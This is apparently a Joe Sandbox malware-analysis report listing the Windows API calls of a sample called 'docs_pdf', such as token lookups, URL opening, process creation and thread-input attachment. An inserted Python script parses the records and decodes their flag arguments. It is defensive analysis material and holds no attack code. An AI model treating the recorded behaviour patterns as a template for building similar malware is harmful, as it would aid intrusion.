                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                            • String ID:
                                                            • API String ID: 1592001646-0
                                                            • Opcode ID: ce340c19acc9982c7e741c16f66ce0b9591f23ccc48fa4c1017e9d1e51e60053
                                                            • Instruction ID: 4b8514149b99375ef22897d4cdcd637886b0fc1803c621912718282a3d1a3c7b
                                                            • Opcode Fuzzy Hash: ce340c19acc9982c7e741c16f66ce0b9591f23ccc48fa4c1017e9d1e51e60053
                                                            • Instruction Fuzzy Hash: 9121AC71E01208EFCB00CFA4C984BEEB7B9EF40344F044069E458A7250DB31AE46CB60
                                                            APIs
                                                            • __setmode.LIBCMT ref: 00110BF2
                                                              • Part of subcall function 000F5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00157B20,?,?,00000000), ref: 000F5B8C
                                                              • Part of subcall function 000F5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00157B20,?,?,00000000,?,?), ref: 000F5BB0
                                                            • _fprintf.LIBCMT ref: 00110C29
                                                            • OutputDebugStringW.KERNEL32(?), ref: 00146331
                                                              • Part of subcall function 00114CDA: _flsall.LIBCMT ref: 00114CF3
                                                            • __setmode.LIBCMT ref: 00110C5E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                            • String ID:
                                                            • API String ID: 521402451-0
                                                            APIs
                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00161A97
                                                              • Part of subcall function 00161B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00161B40
                                                              • Part of subcall function 00161B21: InternetCloseHandle.WININET(00000000), ref: 00161BDD
                                                            Similarity
                                                            • API ID: Internet$CloseConnectHandleOpen
                                                            • String ID:
                                                            • API String ID: 1463438336-0
                                                            APIs
                                                              • Part of subcall function 0014F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0014E1C4,?,?,?,0014EFB7,00000000,000000EF,00000119,?,?), ref: 0014F5BC
                                                              • Part of subcall function 0014F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 0014F5E2
                                                              • Part of subcall function 0014F5AD: lstrcmpiW.KERNEL32(00000000,?,0014E1C4,?,?,?,0014EFB7,00000000,000000EF,00000119,?,?), ref: 0014F613
                                                            • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0014EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0014E1DD
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 0014E203
                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,0014EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0014E237
                                                            Strings
                                                            Similarity
                                                            • API ID: lstrcmpilstrcpylstrlen
                                                            • String ID: cdecl
                                                            • API String ID: 4031866154-3896280584
                                                            APIs
                                                            • _free.LIBCMT ref: 00125351
                                                              • Part of subcall function 0011594C: __FF_MSGBANNER.LIBCMT ref: 00115963
                                                              • Part of subcall function 0011594C: __NMSG_WRITE.LIBCMT ref: 0011596A
                                                              • Part of subcall function 0011594C: RtlAllocateHeap.NTDLL(00E80000,00000000,00000001,00000000,?,?,?,00111013,?), ref: 0011598F
                                                            Similarity
                                                            • API ID: AllocateHeap_free
                                                            • String ID:
                                                            • API String ID: 614378929-0
                                                            APIs
                                                            • _memset.LIBCMT ref: 000F4560
                                                              • Part of subcall function 000F410D: _memset.LIBCMT ref: 000F418D
                                                              • Part of subcall function 000F410D: _wcscpy.LIBCMT ref: 000F41E1
                                                              • Part of subcall function 000F410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000F41F1
                                                            • KillTimer.USER32(?,00000001,?,?), ref: 000F45B5
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000F45C4
                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0012D6CE
                                                            Similarity
                                                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                            • String ID:
                                                            • API String ID: 1378193009-0
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 001540D1
                                                            • _memset.LIBCMT ref: 001540F2
                                                            • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00154144
                                                            • CloseHandle.KERNEL32(00000000), ref: 0015414D
                                                            Similarity
                                                            • API ID: CloseControlCreateDeviceFileHandle_memset
                                                            • String ID:
                                                            • API String ID: 1157408455-0
                                                            APIs
                                                              • Part of subcall function 000F5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00157B20,?,?,00000000), ref: 000F5B8C
                                                              • Part of subcall function 000F5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00157B20,?,?,00000000,?,?), ref: 000F5BB0
                                                            • gethostbyname.WSOCK32(?,?,?), ref: 001666AC
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 001666B7
                                                            • _memmove.LIBCMT ref: 001666E4
                                                            • inet_ntoa.WSOCK32(?), ref: 001666EF
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                            • String ID:
                                                            • API String ID: 1504782959-0
                                                            APIs
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00149043
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00149055
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0014906B
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00149086
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            APIs
                                                              • Part of subcall function 000F2612: GetWindowLongW.USER32(?,000000EB), ref: 000F2623
                                                            • DefDlgProcW.USER32(?,00000020,?), ref: 000F12D8
                                                            • GetClientRect.USER32(?,?), ref: 0012B84B
                                                            • GetCursorPos.USER32(?), ref: 0012B855
                                                            • ScreenToClient.USER32(?,?), ref: 0012B860
                                                            Similarity
                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                            • String ID:
                                                            • API String ID: 4127811313-0
                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,001501FD,?,00151250,?,00008000), ref: 0015166F
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,001501FD,?,00151250,?,00008000), ref: 00151694
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,001501FD,?,00151250,?,00008000), ref: 0015169E
                                                            • Sleep.KERNEL32(?,?,?,?,?,?,?,001501FD,?,00151250,?,00008000), ref: 001516D1
                                                            Similarity
                                                            • API ID: CounterPerformanceQuerySleep
                                                            • String ID:
                                                            • API String ID: 2875609808-0
                                                            APIs
                                                            Similarity
                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                            • String ID:
                                                            • API String ID: 3016257755-0
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 0017B59E
                                                            • ScreenToClient.USER32(?,?), ref: 0017B5B6
                                                            • ScreenToClient.USER32(?,?), ref: 0017B5DA
                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0017B5F5
                                                            Similarity
                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                            • String ID:
                                                            • API String ID: 357397906-0
                                                            • Opcode ID: b89b70ca66f0250034af0ac3c3358d0e7011c8e2643fbd397e900224ba72913f
                                                            • Instruction ID: 64664c7ee4a772188ba779af98c41dbcef8a517cacf372c2236977fcb92f8bf9
                                                            • Opcode Fuzzy Hash: b89b70ca66f0250034af0ac3c3358d0e7011c8e2643fbd397e900224ba72913f
                                                            • Instruction Fuzzy Hash: BE1146B5D04209EFDB41DF99C884AEEFBB5FB08310F108166E914E3620D735AA958F50
                                                            APIs
                                                            • _memset.LIBCMT ref: 0017B8FE
                                                            • _memset.LIBCMT ref: 0017B90D
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,001B7F20,001B7F64), ref: 0017B93C
                                                            • CloseHandle.KERNEL32 ref: 0017B94E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _memset$CloseCreateHandleProcess
                                                            • String ID:
                                                            • API String ID: 3277943733-0
                                                            • Opcode ID: 4553e65b745eee4d83a8492afd2fae4eff6a306d20bc37d6f3844271eace4003
                                                            • Instruction ID: 9a9174f81d6584a34d70a86a3c8053788967a9eef5568da06d81093a8034f30b
                                                            • Opcode Fuzzy Hash: 4553e65b745eee4d83a8492afd2fae4eff6a306d20bc37d6f3844271eace4003
                                                            • Instruction Fuzzy Hash: B3F05EB25443007BE2106B71AC05FBB3AACEB48354F004038FB1CE65D2D7718980C7AC
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 00156E88
                                                              • Part of subcall function 0015794E: _memset.LIBCMT ref: 00157983
                                                            • _memmove.LIBCMT ref: 00156EAB
                                                            • _memset.LIBCMT ref: 00156EB8
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 00156EC8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection_memset$EnterLeave_memmove
                                                            • String ID:
                                                            • API String ID: 48991266-0
                                                            • Opcode ID: 261ae3a2aab00124dd531ae72d1a5d237892165e50138383f88d81c0f393c649
                                                            • Instruction ID: f70d04f97b322e5e002ce9bb62b431bd3d0e25264f23cc5ef149f67f40ef4fa6
                                                            • Opcode Fuzzy Hash: 261ae3a2aab00124dd531ae72d1a5d237892165e50138383f88d81c0f393c649
                                                            • Instruction Fuzzy Hash: D1F0543A104200BBCF016F55DC85E8ABB2AEF59321B048065FE085E21BC731E991CBB4
                                                            APIs
                                                              • Part of subcall function 000F12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000F134D
                                                              • Part of subcall function 000F12F3: SelectObject.GDI32(?,00000000), ref: 000F135C
                                                              • Part of subcall function 000F12F3: BeginPath.GDI32(?), ref: 000F1373
                                                              • Part of subcall function 000F12F3: SelectObject.GDI32(?,00000000), ref: 000F139C
                                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0017C030
                                                            • LineTo.GDI32(00000000,?,?), ref: 0017C03D
                                                            • EndPath.GDI32(00000000), ref: 0017C04D
                                                            • StrokePath.GDI32(00000000), ref: 0017C05B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                            • String ID:
                                                            • API String ID: 1539411459-0
                                                            • Opcode ID: 8bae369296804efe4d88ea9248582fe06374b5272cbc5fab703319b61d8182f5
                                                            • Instruction ID: 24c31aa85d029a79d37f816c064749af88999ba210e283738b952022f8bc2a9c
                                                            • Opcode Fuzzy Hash: 8bae369296804efe4d88ea9248582fe06374b5272cbc5fab703319b61d8182f5
                                                            • Instruction Fuzzy Hash: 40F0BE31000219FBDB122F50AC09FCE3FAAAF15310F148008FA19215E2877909E2CBD5
                                                            APIs
                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0014A399
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0014A3AC
                                                            • GetCurrentThreadId.KERNEL32 ref: 0014A3B3
                                                            • AttachThreadInput.USER32(00000000), ref: 0014A3BA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                            • String ID:
                                                            • API String ID: 2710830443-0
                                                            • Opcode ID: bf185ff5ba88d07409e7c89fc113db9874ad2930c3eddbc55632311f86577568
                                                            • Instruction ID: bb26f1707ffe8cf39bb9bb99bda2d9dc9bfa1fff27fb0d1bf23f3c07cece2a8c
                                                            • Opcode Fuzzy Hash: bf185ff5ba88d07409e7c89fc113db9874ad2930c3eddbc55632311f86577568
                                                            • Instruction Fuzzy Hash: 25E03931585228BADB201FA2DC0CED73F6CFF167A1F408028F50C84460D77185C1CBA0
                                                            APIs
                                                            • GetSysColor.USER32(00000008), ref: 000F2231
                                                            • SetTextColor.GDI32(?,000000FF), ref: 000F223B
                                                            • SetBkMode.GDI32(?,00000001), ref: 000F2250
                                                            • GetStockObject.GDI32(00000005), ref: 000F2258
                                                            • GetWindowDC.USER32(?,00000000), ref: 0012C0D3
                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0012C0E0
                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 0012C0F9
                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 0012C112
                                                            • GetPixel.GDI32(00000000,?,?), ref: 0012C132
                                                            • ReleaseDC.USER32(?,00000000), ref: 0012C13D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                            • String ID:
                                                            • API String ID: 1946975507-0
                                                            • Opcode ID: 327f3bb2592a6484fa233c90214bb1ddee61fb0957b29f7f3b5f5c35add50d5c
                                                            • Instruction ID: d072e48a8cba44ea0bf23d1955c86ef634d1ecbf2095e5b969673bb755de9af4
                                                            • Opcode Fuzzy Hash: 327f3bb2592a6484fa233c90214bb1ddee61fb0957b29f7f3b5f5c35add50d5c
                                                            • Instruction Fuzzy Hash: 23E03932204244EADB215F64FC097D93B20EB15332F04836AFB6D884E1877149D1DB51
                                                            APIs
                                                            • GetCurrentThread.KERNEL32 ref: 00148C63
                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,0014882E), ref: 00148C6A
                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0014882E), ref: 00148C77
                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,0014882E), ref: 00148C7E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CurrentOpenProcessThreadToken
                                                            • String ID:
                                                            • API String ID: 3974789173-0
                                                            • Opcode ID: a0c80034a09c8a73ce2ae19a127736654db3f4e534f9db8bf25b76a1a74c6a13
                                                            • Instruction ID: a950ae36652e7ca150ed769b939f2e29d6826401dc68ba2da6619565240d7a33
                                                            • Opcode Fuzzy Hash: a0c80034a09c8a73ce2ae19a127736654db3f4e534f9db8bf25b76a1a74c6a13
                                                            • Instruction Fuzzy Hash: C2E08636642211DBD7205FB06D0CB9B3BBCFF507A2F14482CB249CA450DB3484C2CB61
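Every record above uses the same machine-generated layout: an "APIs" block of one call per bullet (with "Part of subcall function" lines indented under it), followed by the memory-dump metadata and the "Similarity" IDs. The arguments are printed as raw hex, so a few security-relevant values stay opaque unless you decode them: in the CreateProcessW record, dwCreationFlags 00000020 is NORMAL_PRIORITY_CLASS; in the SendMessageTimeoutW/AttachThreadInput record, fuFlags 00000002 is SMTO_ABORTIFHUNG and uTimeout 00001388 is 5000 ms; the repeated GetDeviceCaps index 0000000C is BITSPIXEL. What follows is an added example, not part of the Joe Sandbox report: a parser for these "APIs" records plus a decoder for those three arguments. The constant values are taken from the Win32 SDK headers; the sample input is reproduced from the records on this page. One caveat a reader should carry into every such listing: an argument shown as "?" is one the sandbox could not recover statically, and the argument columns are a stack-snapshot heuristic (GetCurrentProcess takes no parameters, yet the record prints "(00000028,?,?,?,?,0014882E)" for it), so decoded values are leads to confirm in the disassembly, not facts.

```python
"""Parse Joe Sandbox 'APIs' records and decode a few well-known flag arguments.

Added example; the SAMPLE text is reproduced from the records on this page and
the flag tables come from the Win32 SDK headers.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# One call line as the report prints it, e.g.
#   • OpenThreadToken.ADVAPI32(00000000,?,?,?,0014882E), ref: 00148C6A
#   • GetCurrentThread.KERNEL32 ref: 00148C63
#     • Part of subcall function 0015794E: _memset.LIBCMT ref: 00157983
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class Call:
    api: str
    module: str
    args: list                        # raw tokens; "?" = not recovered by the sandbox
    ref: int                          # call-site address
    subcall_of: Optional[int] = None  # set for "Part of subcall function" lines


@dataclass
class Record:
    calls: list = field(default_factory=list)
    api_id: str = ""
    api_string_id: str = ""


def parse_records(text):
    """Split report text into Records, one per 'APIs' block; other lines are ignored."""
    records, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = Record()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = CALL_RE.match(line)
        if m:
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw is not None else []
            sub = int(m.group("sub"), 16) if m.group("sub") else None
            cur.calls.append(Call(m.group("api"), m.group("mod"), args,
                                  int(m.group("ref"), 16), sub))
        elif s.startswith("• API ID:"):
            cur.api_id = s.split(":", 1)[1].strip()
        elif s.startswith("• API String ID:"):
            cur.api_string_id = s.split(":", 1)[1].strip()
    return records


# Values from the Win32 SDK headers (winbase.h, winuser.h, wingdi.h).
CREATION_FLAGS = {0x4: "CREATE_SUSPENDED", 0x8: "DETACHED_PROCESS",
                  0x10: "CREATE_NEW_CONSOLE", 0x20: "NORMAL_PRIORITY_CLASS",
                  0x400: "CREATE_UNICODE_ENVIRONMENT", 0x08000000: "CREATE_NO_WINDOW"}
SMTO_FLAGS = {0x1: "SMTO_BLOCK", 0x2: "SMTO_ABORTIFHUNG", 0x8: "SMTO_NOTIMEOUTIFNOTHUNG"}
DEVICE_CAPS = {8: "HORZRES", 10: "VERTRES", 12: "BITSPIXEL", 88: "LOGPIXELSX", 90: "LOGPIXELSY"}


def decode_mask(value, table):
    """Render a bitmask with the names in `table`; unknown bits are kept as hex."""
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(hex(rest))
    return "|".join(names) if names else "0"


def decode_call(call):
    """Return {argument_name: decoded} for the arguments this example knows how to read."""
    def num(i):
        try:
            return int(call.args[i], 16)   # "?" raises ValueError and is skipped
        except (IndexError, ValueError):
            return None
    out = {}
    if call.api == "CreateProcessW" and (v := num(5)) is not None:
        out["dwCreationFlags"] = decode_mask(v, CREATION_FLAGS)
    elif call.api == "SendMessageTimeoutW":
        if (v := num(4)) is not None:
            out["fuFlags"] = decode_mask(v, SMTO_FLAGS)
        if (v := num(5)) is not None:
            out["uTimeout_ms"] = v
    elif call.api == "GetDeviceCaps" and (v := num(1)) is not None:
        out["index"] = DEVICE_CAPS.get(v, str(v))
    return out


def summarize(text):
    """(api_string_id, api, ref, decoded) for every call with something to decode."""
    return [(rec.api_string_id, c.api, c.ref, decode_call(c))
            for rec in parse_records(text) for c in rec.calls if decode_call(c)]


# Reproduced from three records on this page (metadata lines between them trimmed).
SAMPLE = """\
APIs
• _memset.LIBCMT ref: 0017B8FE
• _memset.LIBCMT ref: 0017B90D
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,001B7F20,001B7F64), ref: 0017B93C
• CloseHandle.KERNEL32 ref: 0017B94E
Memory Dump Source
• Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
Similarity
• API ID: _memset$CloseCreateHandleProcess
• String ID:
• API String ID: 3277943733-0
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0014A399
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0014A3AC
• GetCurrentThreadId.KERNEL32 ref: 0014A3B3
• AttachThreadInput.USER32(00000000), ref: 0014A3BA
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• API String ID: 2710830443-0
APIs
• EnterCriticalSection.KERNEL32(?), ref: 00156E88
  • Part of subcall function 0015794E: _memset.LIBCMT ref: 00157983
• LeaveCriticalSection.KERNEL32(?), ref: 00156EC8
"""

if __name__ == "__main__":
    for api_string_id, api, ref, decoded in summarize(SAMPLE):
        print(f"{api_string_id:>14}  {api:<20} @ {ref:08X}  {decoded}")
```

Run it over the saved text of a whole report page rather than this excerpt and filter `parse_records` on the call names you care about (CreateProcessW, AttachThreadInput, OpenProcessToken) to get the call-site addresses to jump to in the disassembly. Extend `decode_call` with further argument tables as needed; keep the "?" handling, since a record where the interesting argument was not recovered should produce no decoded value rather than a misleading one.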
                                                            APIs
                                                            • GetDesktopWindow.USER32 ref: 00132187
                                                            • GetDC.USER32(00000000), ref: 00132191
                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001321B1
                                                            • ReleaseDC.USER32(?), ref: 001321D2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                            • String ID:
                                                            • API String ID: 2889604237-0
                                                            • Opcode ID: 471ef2c766f7d6b95e4f9d8c3a62d7dcd979b19043e20a97c768a7e26ddb16d6
                                                            • Instruction ID: e4e4aaad813f1b1f250758dad08d04ef29a0439bdf371a73e8c770e0eda4b9e3
                                                            • Opcode Fuzzy Hash: 471ef2c766f7d6b95e4f9d8c3a62d7dcd979b19043e20a97c768a7e26ddb16d6
                                                            • Instruction Fuzzy Hash: A3E01A75808208EFDB01AF60C908AAE7BF2FF4C350F118429F95AD7660CB3881C2AF40
                                                            APIs
                                                            • GetDesktopWindow.USER32 ref: 0013219B
                                                            • GetDC.USER32(00000000), ref: 001321A5
                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001321B1
                                                            • ReleaseDC.USER32(?), ref: 001321D2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                            • String ID:
                                                            • API String ID: 2889604237-0
                                                            • Opcode ID: 4fce9986a283a79957f7530c4b57ec77a1204336bb5afca2dabfa28a5b3bd383
                                                            • Instruction ID: b5bda6d31a5e757ef7c8191b11d893db15294075a7cb075022678c960aa1a315
                                                            • Opcode Fuzzy Hash: 4fce9986a283a79957f7530c4b57ec77a1204336bb5afca2dabfa28a5b3bd383
                                                            • Instruction Fuzzy Hash: 76E0E575808208AFCB119F60C8086AE7BB2AB4C310F108029F95A97660CB3891C29F40
                                                            APIs
                                                            • OleSetContainedObject.OLE32(?,00000001), ref: 0014B981
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
